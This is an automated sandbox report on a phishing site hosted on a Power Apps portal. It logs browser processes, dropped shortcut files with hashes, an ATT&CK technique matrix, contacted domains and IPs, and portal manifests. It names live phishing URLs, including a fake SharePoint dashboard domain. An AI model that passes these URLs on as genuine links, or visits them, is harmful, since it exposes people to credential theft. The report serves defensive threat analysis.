Source: unknownHTTPS traffic detected: 13.107.5.88:443 -> 192.168.2.17:49857 version: TLS 1.2
Source: unknownHTTPS traffic detected: 2.23.209.160:443 -> 192.168.2.17:49858 version: TLS 1.2
Source: unknownHTTPS traffic detected: 13.85.23.86:443 -> 192.168.2.17:49859 version: TLS 1.2
Source: classification engineClassification label: mal56.phis.win@17/67@56/340
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Program Files\Google\Chrome\Application\Dictionaries
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps
Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://12dec6c2-3c78-e425-b87e-b20197f5da10.powerappsportals.com/
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2196 --field-trial-handle=1948,i,11680625064609720610,96610402005877140,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2196 --field-trial-handle=1948,i,11680625064609720610,96610402005877140,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Program Files\Google\Chrome\Application\chrome.exeDirectory created: C:\Program Files\Google\Chrome\Application\Dictionaries
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity Information1
Scripting
Valid AccountsWindows Management Instrumentation1
Scripting
1
Process Injection
3
Masquerading
OS Credential DumpingSystem Service DiscoveryRemote ServicesData from Local System2
Encrypted Channel
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/Job1
Registry Run Keys / Startup Folder
1
Registry Run Keys / Startup Folder
1
Process Injection
LSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media1
Non-Application Layer Protocol
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
Deobfuscate/Decode Files or Information
Security Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive2
Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
https://12dec6c2-3c78-e425-b87e-b20197f5da10.powerappsportals.com/100%Avira URL Cloudphishing
No Antivirus matches
No Antivirus matches
No Antivirus matches
No Antivirus matches
NameIPActiveMaliciousAntivirus DetectionReputation
stackpath.bootstrapcdn.com
104.18.11.207
truefalse
    unknown
    jsdelivr.map.fastly.net
    151.101.193.229
    truefalse
      unknown
      dual-spo-0005.spo-msedge.net
      13.107.136.10
      truefalse
        unknown
        bizblitzed.com.de
        188.114.96.3
        truefalse
          unknown
          a.nel.cloudflare.com
          35.190.80.1
          truefalse
            unknown
            mira-ssc.tm-4.office.com
            52.107.243.88
            truefalse
              unknown
              maxcdn.bootstrapcdn.com
              104.18.10.207
              truefalse
                unknown
                code.jquery.com
                151.101.66.137
                truefalse
                  unknown
                  dashboard-home-mysharepoint.com
                  104.21.20.188
                  truefalse
                    unknown
                    cdnjs.cloudflare.com
                    104.17.24.14
                    truefalse
                      unknown
                      challenges.cloudflare.com
                      104.18.95.41
                      truefalse
                        unknown
                        www.google.com
                        142.250.9.99
                        truefalse
                          unknown
                          s-part-0032.t-0009.t-msedge.net
                          13.107.246.60
                          truefalse
                            unknown
                            superyachtstbarth.sharepoint.com
                            unknown
                            unknownfalse
                              unknown
                              cdn.jsdelivr.net
                              unknown
                              unknownfalse
                                unknown
                                12dec6c2-3c78-e425-b87e-b20197f5da10.powerappsportals.com
                                unknown
                                unknownfalse
                                  unknown
                                  content.powerapps.com
                                  unknown
                                  unknownfalse
                                    unknown
                                    NameMaliciousAntivirus DetectionReputation
                                    https://12dec6c2-3c78-e425-b87e-b20197f5da10.powerappsportals.com/true
                                      unknown
                                      https://dashboard-home-mysharepoint.com/#test@test.comtrue
                                        unknown
                                        • No. of IPs < 25%
                                        • 25% < No. of IPs < 50%
                                        • 50% < No. of IPs < 75%
                                        • 75% < No. of IPs
                                        IPDomainCountryFlagASNASN NameMalicious
                                        142.250.186.46
                                        unknownUnited States
                                        15169GOOGLEUSfalse
                                        104.18.10.207
                                        maxcdn.bootstrapcdn.comUnited States
                                        13335CLOUDFLARENETUSfalse
                                        13.107.136.10
                                        dual-spo-0005.spo-msedge.netUnited States
                                        8068MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                        74.125.21.95
                                        unknownUnited States
                                        15169GOOGLEUSfalse
                                        151.101.193.229
                                        jsdelivr.map.fastly.netUnited States
                                        54113FASTLYUSfalse
                                        172.217.18.14
                                        unknownUnited States
                                        15169GOOGLEUSfalse
                                        13.107.246.60
                                        s-part-0032.t-0009.t-msedge.netUnited States
                                        8068MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                        52.107.243.88
                                        mira-ssc.tm-4.office.comUnited States
                                        8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                        172.67.194.19
                                        unknownUnited States
                                        13335CLOUDFLARENETUSfalse
                                        151.101.66.137
                                        code.jquery.comUnited States
                                        54113FASTLYUSfalse
                                        151.101.194.137
                                        unknownUnited States
                                        54113FASTLYUSfalse
                                        35.190.80.1
                                        a.nel.cloudflare.comUnited States
                                        15169GOOGLEUSfalse
                                        172.217.18.10
                                        unknownUnited States
                                        15169GOOGLEUSfalse
                                        142.250.9.99
                                        www.google.comUnited States
                                        15169GOOGLEUSfalse
                                        23.38.98.96
                                        unknownUnited States
                                        16625AKAMAI-ASUSfalse
                                        66.102.1.84
                                        unknownUnited States
                                        15169GOOGLEUSfalse
                                        216.58.212.170
                                        unknownUnited States
                                        15169GOOGLEUSfalse
                                        142.250.184.195
                                        unknownUnited States
                                        15169GOOGLEUSfalse
                                        104.17.24.14
                                        cdnjs.cloudflare.comUnited States
                                        13335CLOUDFLARENETUSfalse
                                        151.101.1.229
                                        unknownUnited States
                                        54113FASTLYUSfalse
                                        1.1.1.1
                                        unknownAustralia
                                        13335CLOUDFLARENETUSfalse
                                        142.250.186.163
                                        unknownUnited States
                                        15169GOOGLEUSfalse
                                        104.18.95.41
                                        challenges.cloudflare.comUnited States
                                        13335CLOUDFLARENETUSfalse
                                        216.58.206.46
                                        unknownUnited States
                                        15169GOOGLEUSfalse
                                        104.18.11.207
                                        stackpath.bootstrapcdn.comUnited States
                                        13335CLOUDFLARENETUSfalse
                                        151.101.2.137
                                        unknownUnited States
                                        54113FASTLYUSfalse
                                        20.189.173.25
                                        unknownUnited States
                                        8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                        239.255.255.250
                                        unknownReserved
                                        unknownunknownfalse
                                        64.233.177.100
                                        unknownUnited States
                                        15169GOOGLEUSfalse
                                        188.114.96.3
                                        bizblitzed.com.deEuropean Union
                                        13335CLOUDFLARENETUSfalse
                                        20.119.128.8
                                        unknownUnited States
                                        8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                        104.21.20.188
                                        dashboard-home-mysharepoint.comUnited States
                                        13335CLOUDFLARENETUSfalse
                                        IP
                                        192.168.2.17
                                        Joe Sandbox version:40.0.0 Tourmaline
                                        Analysis ID:1500038
                                        Start date and time:2024-08-27 20:02:57 +02:00
                                        Joe Sandbox product:CloudBasic
                                        Overall analysis duration:
                                        Hypervisor based Inspection enabled:false
                                        Report type:full
                                        Cookbook file name:defaultwindowsinteractivecookbook.jbs
                                        Sample URL:https://12dec6c2-3c78-e425-b87e-b20197f5da10.powerappsportals.com/
                                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                        Number of analysed new started processes analysed:19
                                        Number of new started drivers analysed:0
                                        Number of existing processes analysed:0
                                        Number of existing drivers analysed:0
                                        Number of injected processes analysed:0
                                        Technologies:
                                        • EGA enabled
                                        Analysis Mode:stream
                                        Analysis stop reason:Timeout
                                        Detection:MAL
                                        Classification:mal56.phis.win@17/67@56/340
                                        • Exclude process from analysis (whitelisted): SIHClient.exe
                                        • Excluded IPs from analysis (whitelisted): 142.250.184.195, 20.119.128.8, 216.58.206.46, 66.102.1.84, 34.104.35.123, 23.38.98.96, 23.38.98.104, 142.250.186.46, 74.125.21.95, 172.217.18.10, 64.233.177.100, 64.233.177.138, 64.233.177.139, 64.233.177.113, 64.233.177.102, 64.233.177.101, 20.189.173.25, 216.58.212.170, 142.250.184.234, 172.217.16.202, 142.250.74.202, 142.250.186.74, 142.250.186.170, 142.250.185.170, 142.250.185.138, 216.58.206.42, 216.58.206.74, 142.250.186.106, 142.250.185.234, 142.250.181.234, 142.250.186.42, 142.250.185.202
                                        • Excluded domains from analysis (whitelisted): us.events.data.trafficmanager.net, accounts.google.com, content-autofill.googleapis.com, encrypted-tbn0.gstatic.com, ajax.googleapis.com, waws-prod-bn1-179-e41c.eastus2.cloudapp.azure.com, e40491.dscd.akamaiedge.net, clientservices.googleapis.com, res-1.cdn.office.net, pa-static-ms.azureedge.net, firstparty-azurefd-prod.trafficmanager.net, 192075-ipv4v6w.farm.dprodmgd105.sharepointonline.com.akadns.net, clients2.google.com, edgedl.me.gvt1.com, pa-static-ms.afd.azureedge.net, onedscolprdwus20.westus.cloudapp.azure.com, clients.l.google.com, res-1.cdn.office.net-c.edgekey.net, pa-static.trafficmanager.net, us-mobile.events.data.microsoft.com, res-1.cdn.office.net-c.edgekey.net.globalredir.akadns.net
                                        • Not all processes where analyzed, report is missing behavior information
                                        • VT rate limit hit for: https://12dec6c2-3c78-e425-b87e-b20197f5da10.powerappsportals.com/
                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Tue Aug 27 17:03:27 2024, atime=Mon Oct 2 20:46:57 2023, length=1210144, window=hide
                                        Category:dropped
                                        Size (bytes):2677
                                        Entropy (8bit):3.9884397866469286
                                        Encrypted:false
                                        SSDEEP:
                                        MD5:32E664F05637AC5A29CF90A604621475
                                        SHA1:129769D84799BA0CFE84EA84CE261F20366024F1
                                        SHA-256:6BD2B611B4FB5F01460D7B01062B16244C71493CAB4D415F1DA48EE41AC4E027
                                        SHA-512:4B3C899A52B0BF9D29C4A91C46FA7AED31D091DAE362B8A48F15EBB50B9B8F09F4E09125340C0B000766EA00C895B7E54B9CD0D459000FDC2093E163FFB49638
                                        Malicious:false
                                        Reputation:unknown
                                        Preview:L..................F.@.. ...$+.,.....k.j........y... w......................1....P.O. .:i.....+00.../C:\.....................1.....FWoN..PROGRA~1..t......O.I.Ye.....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Ym.....L.....................p+j.G.o.o.g.l.e.....T.1.....FW.N..Chrome..>......CW.V.Ym.....M......................W..C.h.r.o.m.e.....`.1.....FW.N..APPLIC~1..H......CW.V.Ym............................W..A.p.p.l.i.c.a.t.i.o.n.....n.2. w..BW. .CHROME~1.EXE..R......CW.V.Yn............................3.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...................C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Tue Aug 27 17:03:27 2024, atime=Mon Oct 2 20:46:57 2023, length=1210144, window=hide
                                        Category:dropped
                                        Size (bytes):2679
                                        Entropy (8bit):4.00626516234391
                                        Encrypted:false
                                        SSDEEP:
                                        MD5:BCAF9D6CC6354184E1F4FF33F096B60E
                                        SHA1:A051CAF58ADC6392E54367AE7E873C0845E7465E
                                        SHA-256:8280367B8F54A0571CBF0C42E918F2AE54B3D2FA54AAF62DDB2F9DA796742D73
                                        SHA-512:C98E859D59641EF88D93E62F2C0D0E33C976CB89BAD6D46508FA0C5246BDA14C36156814B2F64BF30B625EA201BA653D85DEBD3F67BFA84DE15D18FA18D121CE
                                        Malicious:false
                                        Reputation:unknown
                                        Preview:L..................F.@.. ...$+.,....+..j........y... w......................1....P.O. .:i.....+00.../C:\.....................1.....FWoN..PROGRA~1..t......O.I.Ye.....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Ym.....L.....................p+j.G.o.o.g.l.e.....T.1.....FW.N..Chrome..>......CW.V.Ym.....M......................W..C.h.r.o.m.e.....`.1.....FW.N..APPLIC~1..H......CW.V.Ym............................W..A.p.p.l.i.c.a.t.i.o.n.....n.2. w..BW. .CHROME~1.EXE..R......CW.V.Yn............................3.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...................C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Oct 6 08:54:41 2023, atime=Mon Oct 2 20:46:57 2023, length=1210144, window=hide
                                        Category:dropped
                                        Size (bytes):2693
                                        Entropy (8bit):4.0157464966100225
                                        Encrypted:false
                                        SSDEEP:
                                        MD5:42B75AC8CCFF248AB4FE2E9E8EA05A23
                                        SHA1:5B9E2E4F7E108FF251B6C6952A9D604C63DE3800
                                        SHA-256:C0E438C84B33036A98180D4DA500AF9C3D056DFDE1CC3F1EB58C2360B1BFFA51
                                        SHA-512:AA60FD01EAD90AA023BBA88E823A17227D53CB0F46967234013C83E0FB02DEA9CA9AAC47E58CE3CBF6129058AAACA86D81325B3F0722BB440E633B1654BDFAE2
                                        Malicious:false
                                        Reputation:unknown
                                        Preview:L..................F.@.. ...$+.,.....v. ;.......y... w......................1....P.O. .:i.....+00.../C:\.....................1.....FWoN..PROGRA~1..t......O.I.Ye.....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Ym.....L.....................p+j.G.o.o.g.l.e.....T.1.....FW.N..Chrome..>......CW.V.Ym.....M......................W..C.h.r.o.m.e.....`.1.....FW.N..APPLIC~1..H......CW.V.Ym............................W..A.p.p.l.i.c.a.t.i.o.n.....n.2. w..BW. .CHROME~1.EXE..R......CW.VFW.N...........................3.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...................C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Tue Aug 27 17:03:27 2024, atime=Mon Oct 2 20:46:57 2023, length=1210144, window=hide
                                        Category:dropped
                                        Size (bytes):2681
                                        Entropy (8bit):4.004844888430208
                                        Encrypted:false
                                        SSDEEP:
                                        MD5:F36D354A7C3CE292FA418B0CDD6BBC31
                                        SHA1:51A0E3F55818922BD690C18C41BEEDD8E62E7577
                                        SHA-256:C0CA92C13310146729C69F6211F9085C2AF271D762DB9C4D80BB5D6620B3F783
                                        SHA-512:264B770B2D07C39889F3233930B3AB48AB3AC973F1392063649C4A798FB93E7A50BA14FC13905AE8C18E5268EC2DA1794DAB2DD965820213727E280F7E069AB6
                                        Malicious:false
                                        Reputation:unknown
                                        Preview:L..................F.@.. ...$+.,.....,.j........y... w......................1....P.O. .:i.....+00.../C:\.....................1.....FWoN..PROGRA~1..t......O.I.Ye.....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Ym.....L.....................p+j.G.o.o.g.l.e.....T.1.....FW.N..Chrome..>......CW.V.Ym.....M......................W..C.h.r.o.m.e.....`.1.....FW.N..APPLIC~1..H......CW.V.Ym............................W..A.p.p.l.i.c.a.t.i.o.n.....n.2. w..BW. .CHROME~1.EXE..R......CW.V.Yn............................3.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...................C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Tue Aug 27 17:03:27 2024, atime=Mon Oct 2 20:46:57 2023, length=1210144, window=hide
                                        Category:dropped
                                        Size (bytes):2681
                                        Entropy (8bit):3.9939141593166667
                                        Encrypted:false
                                        SSDEEP:
                                        MD5:94B9B1CF2471019044976EA7A8EBA5BF
                                        SHA1:D4D8F3FABD22A4B2EBB40497F10C3C9B47C9EE46
                                        SHA-256:F3CF58C0C707A7760952DE604A710C887EC141712CF5778128B69F2DADE9E4FD
                                        SHA-512:220DFB3A0252DA201C2B88A78E37151AE11F3F3026BBFFF5C1DB3FE67D688C7CFC99FC43FA5F2E729C795753FB6A6AC8A1E7B7EBF1003C888298E74B1A98C567
                                        Malicious:false
                                        Reputation:unknown
                                        Preview:L..................F.@.. ...$+.,.....:.j........y... w......................1....P.O. .:i.....+00.../C:\.....................1.....FWoN..PROGRA~1..t......O.I.Ye.....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Ym.....L.....................p+j.G.o.o.g.l.e.....T.1.....FW.N..Chrome..>......CW.V.Ym.....M......................W..C.h.r.o.m.e.....`.1.....FW.N..APPLIC~1..H......CW.V.Ym............................W..A.p.p.l.i.c.a.t.i.o.n.....n.2. w..BW. .CHROME~1.EXE..R......CW.V.Yn............................3.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...................C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Tue Aug 27 17:03:27 2024, atime=Mon Oct 2 20:46:57 2023, length=1210144, window=hide
                                        Category:dropped
                                        Size (bytes):2683
                                        Entropy (8bit):4.004960672787469
                                        Encrypted:false
                                        SSDEEP:
                                        MD5:30C34EF07F1AA9C66BE4A68356961325
                                        SHA1:5B3221DE0F7C625A237C47D8256E55069D6905BB
                                        SHA-256:48508EC2C015905C73DF8C0A15A6A5EFC2265B44034F349B712886DF327AF671
                                        SHA-512:295C065B2D58B8378A9E226CDAF002929668B6B6D79DE63D171FC7097F8CB196EAA2131FD18577F16866EA1A0088CC8DC42369569DAE8BD09E769A3011BCC2B7
                                        Malicious:false
                                        Reputation:unknown
                                        Preview:L..................F.@.. ...$+.,....#.j........y... w......................1....P.O. .:i.....+00.../C:\.....................1.....FWoN..PROGRA~1..t......O.I.Ye.....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Ym.....L.....................p+j.G.o.o.g.l.e.....T.1.....FW.N..Chrome..>......CW.V.Ym.....M......................W..C.h.r.o.m.e.....`.1.....FW.N..APPLIC~1..H......CW.V.Ym............................W..A.p.p.l.i.c.a.t.i.o.n.....n.2. w..BW. .CHROME~1.EXE..R......CW.V.Yn............................3.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...................C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        File Type:JSON data
                                        Category:downloaded
                                        Size (bytes):48
                                        Entropy (8bit):4.561641344913579
                                        Encrypted:false
                                        SSDEEP:
                                        MD5:59BEBF7344F881A307AFA83E3FA6A07D
                                        SHA1:6984EB33F7933B74B0AF865D57E23B4E54E0B3F6
                                        SHA-256:FF51D4AF422D80514F6775601B488DDC15DD99ADC611E47E1B14D90A5862A72B
                                        SHA-512:13C0689FBF80ECB847BC4EC1B451AEA7B5B8B6306BB3ACB4D2C930B9940E9A80FC60DB9BA9418C5B8CD6E8B384C97FB3B156084FED095379E3DBA5591313FB5F
                                        Malicious:false
                                        Reputation:unknown
                                        URL:https://content.powerapps.com/resource/powerappsportal/controls/host/manifest-0.1.19.json
                                        Preview:{. "hash": "/host/main.688f7e4d22.chunk.js".}
                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        File Type:JSON data
                                        Category:downloaded
                                        Size (bytes):8462
                                        Entropy (8bit):4.54180952983424
                                        Encrypted:false
                                        SSDEEP:
                                        MD5:A87920CE1B76BDF8E8909529BB456110
                                        SHA1:05F01E2B314062ACE2264D4E7969E650D9B3661C
                                        SHA-256:D35702ED5A723B0F777948273C28ACCBD7A1E11646EF6964B59B69089D4E760E
                                        SHA-512:A3CA4B4AAEDD69C0A9F97F8B1045C183165873D5992A00D118D25B77CB0310FBF3027BC0A9A35825E16935BB60E59A3EA5E3D6C42523D631108CB86AB270DE54
                                        Malicious:false
                                        Reputation:unknown
                                        URL:https://content.powerapps.com/resource/powerappsportal/controls/controls_fluent_v9/manifest-0.0.21.json
                                        Preview:{. "Avatar": {. "library": "controls_fluent_v9",. "remoteEntry": "/controls_fluent_v9/remoteEntry.93ef876a56.js",. "control": "./Avatar". },. "AvatarGroup": {. "library": "controls_fluent_v9",. "remoteEntry": "/controls_fluent_v9/remoteEntry.93ef876a56.js",. "control": "./AvatarGroup". },. "Badge": {. "library": "controls_fluent_v9",. "remoteEntry": "/controls_fluent_v9/remoteEntry.93ef876a56.js",. "control": "./Badge". },. "CounterBadge": {. "library": "controls_fluent_v9",. "remoteEntry": "/controls_fluent_v9/remoteEntry.93ef876a56.js",. "control": "./CounterBadge". },. "PresenceBadge": {. "library": "controls_fluent_v9",. "remoteEntry": "/controls_fluent_v9/remoteEntry.93ef876a56.js",. "control": "./PresenceBadge". },. "Button": {. "library": "controls_fluent_v9",. "remoteEntry": "/controls_fluent_v9/remoteEntry.93ef876a56.js",.
                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        File Type:Unicode text, UTF-8 text, with CRLF line terminators
                                        Category:downloaded
                                        Size (bytes):30149
                                        Entropy (8bit):5.083743343936363
                                        Encrypted:false
                                        SSDEEP:
                                        MD5:59380F382417BF76CCD73D0E7FC38B7E
                                        SHA1:9A1227F495EDF0331145EE9FEE187F2F0D1E00B5
                                        SHA-256:2FD89992331C73B2D2383CB19D799425B42AF4EE09290B65B380C29F2412F3C8
                                        SHA-512:E6389F488969BE28AEC5A734681A47028E50323FF6D4E4A2C6B798B3073FDD0392195F8C367E8ED5515F9DB23A19D30FED0DD5E676F5E0F6B2B818E1497185AE
                                        Malicious:false
                                        Reputation:unknown
                                        URL:https://12dec6c2-3c78-e425-b87e-b20197f5da10.powerappsportals.com/_portal/307ef38f-c0e4-48b4-9ae5-974b9f08618d/Resources/ResourceManager?lang=en-US
